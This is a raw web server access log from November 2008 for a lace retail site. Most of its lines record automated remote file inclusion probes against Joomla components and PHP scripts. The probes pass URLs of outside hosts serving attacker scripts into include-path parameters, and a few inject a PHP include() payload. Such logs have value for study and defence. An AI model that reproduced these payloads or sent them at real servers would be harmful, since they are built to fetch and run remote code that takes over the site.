70.85.149.242 - - [22/Nov/2008:04:00:17 -0800] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.handmadelaces.com"
70.85.149.242 - - [22/Nov/2008:04:00:17 -0800] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.handmadelaces.com"
70.85.149.242 - - [22/Nov/2008:04:00:17 -0800] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.handmadelaces.com"
70.85.149.242 - - [22/Nov/2008:04:00:17 -0800] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.handmadelaces.com"
65.55.105.22 - - [22/Nov/2008:04:01:41 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.handmadelaces.com"
65.55.105.22 - - [22/Nov/2008:04:01:41 -0800] "GET /logs/?S=A HTTP/1.1" 200 2368 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.handmadelaces.com"
66.160.185.20 - - [22/Nov/2008:04:01:58 -0800] "GET /logs/access_081023.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
66.160.185.20 - - [22/Nov/2008:04:01:58 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
66.160.185.20 - - [22/Nov/2008:04:01:58 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
198.65.57.223 - - [22/Nov/2008:04:02:07 -0800] "GET /logs/?sourcedir=http://excelsior-guild.net/vnc/id.txt?? HTTP/1.0" 200 2352 "-" "libwww-perl/5.50" "www.handmadelaces.com"
198.65.57.223 - - [22/Nov/2008:04:02:07 -0800] "GET /?sourcedir=http://excelsior-guild.net/vnc/id.txt?? HTTP/1.0" 200 763 "-" "libwww-perl/5.50" "www.handmadelaces.com"
66.160.185.20 - - [22/Nov/2008:04:02:09 -0800] "GET /logs/access_081023.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
66.160.185.20 - - [22/Nov/2008:04:02:09 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
66.160.185.20 - - [22/Nov/2008:04:02:09 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
198.65.57.223 - - [22/Nov/2008:04:02:42 -0800] "GET /logs/access_081016.log//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.handmadelaces.com"
8.7.26.27 - - [22/Nov/2008:04:08:13 -0800] "GET /?sourcedir=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.handmadelaces.com"
8.7.26.27 - - [22/Nov/2008:04:08:13 -0800] "GET /logs/?sourcedir=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 200 2368 "-" "libwww-perl/5.79" "www.handmadelaces.com"
8.7.26.27 - - [22/Nov/2008:04:08:13 -0800] "GET /logs/access_081017.log/?sourcedir=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
203.152.222.4 - - [22/Nov/2008:04:08:14 -0800] "GET /errors.php?error=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
198.65.57.223 - - [22/Nov/2008:04:08:16 -0800] "GET /?sourcedir=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.handmadelaces.com"
8.7.26.27 - - [22/Nov/2008:04:08:16 -0800] "GET /logs/access_081019.log/?sourcedir=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
198.65.57.223 - - [22/Nov/2008:04:08:16 -0800] "GET /logs/access_081019.log/?sourcedir=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.handmadelaces.com"
198.65.57.223 - - [22/Nov/2008:04:08:16 -0800] "GET /logs/access_081017.log/?sourcedir=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.handmadelaces.com"
198.65.57.223 - - [22/Nov/2008:04:08:16 -0800] "GET /logs/?sourcedir=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.0" 200 2352 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:08:21 -0800] "GET /?sourcedir=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:08:21 -0800] "GET /logs/?sourcedir=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 200 2368 "-" "libwww-perl/5.811" "www.handmadelaces.com"
87.66.0.221 - - [22/Nov/2008:04:08:23 -0800] "GET /logs/access_081017.log/encapscms_PATH/core/core.php?root=http://rfi.at.ua/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.handmadelaces.com"
87.66.0.221 - - [22/Nov/2008:04:08:24 -0800] "GET /encapscms_PATH/core/core.php?root=http://rfi.at.ua/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.handmadelaces.com"
87.66.0.221 - - [22/Nov/2008:04:08:25 -0800] "GET /logs/encapscms_PATH/core/core.php?root=http://rfi.at.ua/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:08:25 -0800] "GET /logs/access_081019.log/?sourcedir=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:08:53 -0800] "GET /logs/access_081017.log/?sourcedir=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:08:32 -0800] "GET /logs/access_081017.log/?sourcedir=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:08:32 -0800] "GET /logs/?sourcedir=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 200 2368 "-" "libwww-perl/5.811" "www.handmadelaces.com"
85.104.74.243 - - [22/Nov/2008:04:08:36 -0800] "GET /images/rectangular_lace_table_runner_b.jpg HTTP/1.1" 404 275 "http://ecay.blogcu.com/orta-sehpa-danteli-cok-guzellllll_533862.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)" "handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:08:42 -0800] "GET /?sourcedir=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:08:45 -0800] "GET /logs/access_081019.log/?sourcedir=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:08:51 -0800] "GET /logs/access_081017.log/?sourcedir=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:08:51 -0800] "GET /?sourcedir=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:08:52 -0800] "GET /logs/?sourcedir=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 200 2368 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:08:55 -0800] "GET /logs/access_081019.log/?sourcedir=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:09:12 -0800] "GET /logs/?sourcedir=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 200 2368 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:09:12 -0800] "GET /?sourcedir=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:09:12 -0800] "GET /logs/access_081017.log/?sourcedir=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:09:18 -0800] "GET /logs/access_081019.log/?sourcedir=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
198.65.57.223 - - [22/Nov/2008:04:11:35 -0800] "GET /logs/access.log/?sourcedir=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.handmadelaces.com"
198.65.57.223 - - [22/Nov/2008:04:11:35 -0800] "GET /?sourcedir=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.handmadelaces.com"
198.65.57.223 - - [22/Nov/2008:04:11:35 -0800] "GET /logs/?sourcedir=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.0" 200 2352 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:11:54 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
70.85.149.242 - - [22/Nov/2008:04:12:28 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.handmadelaces.com"
70.85.149.242 - - [22/Nov/2008:04:12:28 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.handmadelaces.com"
70.85.149.242 - - [22/Nov/2008:04:12:28 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.handmadelaces.com"
87.66.0.221 - - [22/Nov/2008:04:12:34 -0800] "GET /logs/access_081006.log/encapscms_PATH/core/core.php?root=http://rfi.at.ua/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.handmadelaces.com"
198.65.57.223 - - [22/Nov/2008:04:13:09 -0800] "GET /logs/access_081017.log/?sourcedir=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.handmadelaces.com"
198.65.57.223 - - [22/Nov/2008:04:13:10 -0800] "GET /logs/access_081019.log/?sourcedir=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.handmadelaces.com"
203.152.222.4 - - [22/Nov/2008:04:13:42 -0800] "GET /logs/access.log/errors.php?error=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
203.152.222.4 - - [22/Nov/2008:04:13:42 -0800] "GET /errors.php?error=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
203.152.222.4 - - [22/Nov/2008:04:13:43 -0800] "GET /logs/errors.php?error=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
87.106.16.18 - - [22/Nov/2008:04:16:24 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.handmadelaces.com"
87.106.16.18 - - [22/Nov/2008:04:16:24 -0800] "GET /logs/access_081016.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.handmadelaces.com"
87.106.16.18 - - [22/Nov/2008:04:16:24 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.handmadelaces.com"
200.54.154.10 - - [22/Nov/2008:04:16:28 -0800] "GET /errors.php?error=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
87.106.16.18 - - [22/Nov/2008:04:16:29 -0800] "GET /logs/access_081016.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.handmadelaces.com"
87.106.16.18 - - [22/Nov/2008:04:16:29 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.handmadelaces.com"
87.106.16.18 - - [22/Nov/2008:04:16:29 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.handmadelaces.com"
74.52.71.162 - - [22/Nov/2008:04:18:11 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.52.71.162 - - [22/Nov/2008:04:18:11 -0800] "GET /logs/access_081016.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.52.71.162 - - [22/Nov/2008:04:18:11 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
70.85.149.242 - - [22/Nov/2008:04:20:30 -0800] "GET /logs/access_081023.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.handmadelaces.com"
200.54.154.10 - - [22/Nov/2008:04:21:41 -0800] "GET /logs/access_081018.log/phphtml.php?htmlclass_path=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:21:52 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
195.12.53.176 - - [22/Nov/2008:04:22:10 -0800] "GET /logs/access.log/errors.php?error=http://www.geocities.com/arifferoza/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
195.12.53.176 - - [22/Nov/2008:04:22:11 -0800] "GET /logs/errors.php?error=http://www.geocities.com/arifferoza/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
87.66.0.221 - - [22/Nov/2008:04:22:12 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.handmadelaces.com"
87.66.0.221 - - [22/Nov/2008:04:22:12 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.handmadelaces.com"
195.12.53.176 - - [22/Nov/2008:04:22:15 -0800] "GET /logs/access.log/errors.php?error=http://www.geocities.com/arifferoza/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
195.12.53.176 - - [22/Nov/2008:04:22:15 -0800] "GET /logs/errors.php?error=http://www.geocities.com/arifferoza/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:23:07 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:23:07 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:23:07 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.handmadelaces.com"
88.45.97.18 - - [22/Nov/2008:04:23:13 -0800] "GET /cyberfolio/portfolio/msg/view.php?av=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.handmadelaces.com"
88.45.97.18 - - [22/Nov/2008:04:23:13 -0800] "GET /logs/cyberfolio/portfolio/msg/view.php?av=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.handmadelaces.com"
83.2.108.2 - - [22/Nov/2008:04:23:54 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.handmadelaces.com"
83.2.108.2 - - [22/Nov/2008:04:23:54 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:24:27 -0800] "GET /logs/access_081010.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:24:28 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:24:28 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:24:51 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:24:52 -0800] "GET /logs/access_081010.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:24:52 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.handmadelaces.com"
211.76.137.5 - - [22/Nov/2008:04:25:50 -0800] "GET /logs//includes/dbal.php?eqdkp_root_path=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.handmadelaces.com"
211.76.137.5 - - [22/Nov/2008:04:25:50 -0800] "GET /includes/dbal.php?eqdkp_root_path=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:27:09 -0800] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:27:11 -0800] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:27:36 -0800] "GET /logs/access_081018.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:29:02 -0800] "GET /logs/access_081018.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:29:02 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:29:02 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:29:52 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:29:52 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:29:52 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:29:52 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
202.155.5.43 - - [22/Nov/2008:04:29:58 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
66.40.52.28 - - [22/Nov/2008:04:31:00 -0800] "GET /index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.handmadelaces.com"
66.40.52.28 - - [22/Nov/2008:04:31:00 -0800] "GET /logs/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.handmadelaces.com"
66.40.52.28 - - [22/Nov/2008:04:31:00 -0800] "GET /logs/access_081016.log/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:32:26 -0800] "GET /logs/access_081020.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.handmadelaces.com"
61.7.235.75 - - [22/Nov/2008:04:32:38 -0800] "GET /logs/send_reminders.php?includedir=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.handmadelaces.com"
61.7.235.75 - - [22/Nov/2008:04:32:38 -0800] "GET /send_reminders.php?includedir=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.handmadelaces.com"
